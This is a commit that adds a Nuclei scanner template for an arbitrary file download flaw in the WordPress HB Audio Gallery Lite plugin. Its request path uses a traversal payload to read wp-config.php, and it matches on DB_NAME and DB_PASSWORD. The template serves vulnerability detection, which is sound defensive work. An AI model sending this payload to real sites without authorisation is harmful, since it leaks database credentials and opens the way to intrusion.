Create wp-hb-audio-lfi.yaml
parent
fc660ec0db
commit
150da05a81
|
@ -0,0 +1,27 @@
|
|||
id: wp-hb-audio-lfi
|
||||
|
||||
info:
|
||||
name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html
|
||||
tags: wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue